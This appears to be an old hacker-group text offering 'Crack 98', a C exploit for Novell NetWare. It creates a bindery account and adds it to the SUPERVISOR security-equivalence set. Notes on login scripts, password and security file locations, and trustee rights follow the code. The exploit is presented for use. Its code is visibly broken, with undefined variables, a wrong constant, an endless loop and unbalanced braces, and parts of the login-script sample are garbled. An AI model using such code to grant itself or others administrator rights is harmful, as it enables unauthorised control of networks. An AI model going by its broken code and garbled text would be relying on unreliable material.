Novell Netware Administration Exploit
                  Author:   Mnemonic               
                  email :   mnem@legions.org

#include <stdio.h>
#include <io.h>
#include <fcntl.h>
#include <string.h>
#include <stddef.h>
#include <errno.h>
#include <direct.h>
#include <nwtypes.h>
#include <nwbindry.h>
#include <dos.h>
main(int argc, char *argv[])
{
long task;
char *account
printf("Crack 98 written by Mnemonic\n");
task = SetCurrentTask(-1L);
SetCurrentConnection(0);
account = argv[1];
while (argc > 1)
{
if (CreateBinderyObject(name, OT_USER, BF_STATIC, 0x31) == 0)
printf("The account %s has been created\n", account);
else
printf("The account %s already exists on the network\n", account);
CreateProperty(account, OUT_USER, "SECURITY_EQUALS", BF_STATIC | BF_SET, 
0x32);
if (AddBinderyObjectToSet(account, OT_USER, "SECURITY_EQUALS", 
"SUPERVISOR", OT_USER) == 0)
printf("The account %s has been made supervisor equivalent\n", account);
else
printf("The account is already supervisor equivalent\n");
}
printf("You must enter an account name\n");
account = argv[1];
}
ReturnBlockOfTasks(&task, 1L);
ReturnConnection(GetCurrentConnection());
return 0;
}

        Crack '98 sets the connection to 0 for supervisor,
and then creates a user object in the bindery which must
have an equivalent property.  Then it adds supervisor
equivalent to the supervisor equivalence property so it
can make an account equivalent to that of supervisor.  It
supports Novell NetWare 2.x, 3.x, 4.x, and Novell IntraNet
Ware 4.x.  This is what the account's login script should
look like after you've run the program.

WRITE "Good%GREETING_TIME, %LOGIN_NAME."
MAP DISPLAY OFF
MAP ERRORS OFF
Remark:  Set 1st drive to most appropriate directory
MAP *1:=SYS:; *1=%LOGIIF "%1"="SUPERVISOR" MAP *1:=SYS:SYSTEM
Remark:  Set search drives (S2 machine-OS dependent).
MAPT S1:=SYS:PUBLIC;  S2:=S1:%MACHINE/%OS/%OS_VERSION
Remark:  Now display all the current drive settings.
MAP DISPLAY ON
MAP

        Here, the SUPERVISOR default logins are the
directory names SYS:SYSTEM and/or SYS:PUBLIC as the
filename NET$LOG.DAT.  NetWare assigns each user or
group a unique number when it is defined.  The
SUPERVISOR user number is always 1.  All other users and
groups are assigned hexadecimal numbers.  Since all mail
directories are created in the directory SYS:MAIL, the
LAN SUPERVISOR's mail directory is SYS:MAIL\1.  The user
login script itself, however, is stored in a file named
LOGIN with no extension.  For example, IL\1\LOGIN.  The
user login script is used to define user-specific
resources and environment settings.  If a user login
script file exists it will be executed.  If it does not
exist, then the LOGIN program invokes a default user
login script.  This can be a source of trouble, as the
default user login script might interfere with drive
mappings in the system login script.
        There are two utilities provided with NetWare to
create new user accounts.  These are SYSCON and
MAKEUSER.  Both are displayed as options on the NetWare
Login main screen, and can be used to create a new
account, and its corresponding login script.
        When a user logs into the NetWare, the LOGIN
program verifies if the entered password specifies the
id that corresponds with it, and then retrieves the user
rights information from the file server.  If one exists,
the system login script is then executed.  This script,
is then stored in the user acount's mail directory.  In
NetWare 2.x, the password file is NET$BVAL.SYS, and is
kept in the SYS:PASSWD directory along with the security
file NET$BIND.SYS.  In 3.x, the password file is
NET$VAL.SYS and is also kept in the SYS:PASSWD directory
along with the security files NET$OBJ.SYS and
NET$PROP.SYS.  In 4.x you have PARTITIO.NDS, BLOCK.NDS,
ENTRY.NDS, VALUE.NDS, and UNINSTAL.NDS.  The system
login script is created with the SYSCON utility be the
LAN supervisor and is stored in a file named NET$LOG.DAT
in the SYS:PUBLIC directory.  Here is an example of how
permissions are assigned.

USER1 is a member of the groups EVERYONE and ACCOUNTING.
All users are members of EVERYONE.
Group EVERYONE has Read, Open, and Search rights in SYS:APPS.
Group ACCOUNTING has Write, Create, and Delete rights in SYS:APPS\DATA
USER1 has Parental and Modify rights in SYS:APPS\DATA\USER1

USER1's trustee priveleges are accounted for as

Directory               Group           Rights
SYS:APPS                EVERYONE        [R O   S ]
SYS:APPS\DATA           ACCOUNTING      [ W CD   ]
Trustee priveleges                      [RWOCD S ]

The one access type that gains everything is called
Supervisory.  Its environmetal settings are RWOCDPSM.

Mnemonic <mnem@legions.org>

check out: http://www.legions.org